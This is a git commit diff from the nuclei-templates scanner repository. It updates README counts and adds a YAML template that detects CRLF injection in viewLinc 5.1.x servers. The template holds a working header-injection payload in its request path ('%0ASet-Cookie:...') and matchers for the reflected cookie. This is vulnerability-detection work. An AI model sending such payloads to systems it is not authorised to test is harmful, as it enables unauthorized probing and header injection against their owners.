Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

README.md

@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
 
 | Templates      | Counts                         | Templates       | Counts                          | Templates        | Counts                         |
 | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
-| cves           | 245            | vulnerabilities | 111 | exposed-panels   | 107   |
+| cves           | 245            | vulnerabilities | 112 | exposed-panels   | 107   |
 | exposures      | 63      | technologies    | 52      | misconfiguration | 54 |
 | workflows      | 24        | miscellaneous   | 16     | default-logins   | 19 |
 | exposed-tokens | 9 | dns             | 6               | fuzzing          | 4          |
 | helpers        | 2        | takeovers       | 1         | -                | -                              |
 
-**76 directories, 738 files**.
+**76 directories, 739 files**.
 
 </td>
 </tr>

vulnerabilities/other/viewlinc-crlf-injection.yaml

@@ -0,0 +1,29 @@
+id: viewlinc-crlf-injection
+
+info:
+  name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
+  author: geeknik
+  severity: low
+  reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
+  tags: crlf,viewlinc
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        words:
+          - "Server: viewLinc/5.1.2.367"
+          - "Set-Cookie: crlfinjection=crlfinjection"
+        part: header
+        condition: and
+
+      - type: word
+        words:
+          - "Server: viewLinc/5.1.1.50"
+          - "Set-Cookie: crlfinjection=crlfinjection"
+        part: header
+        condition: and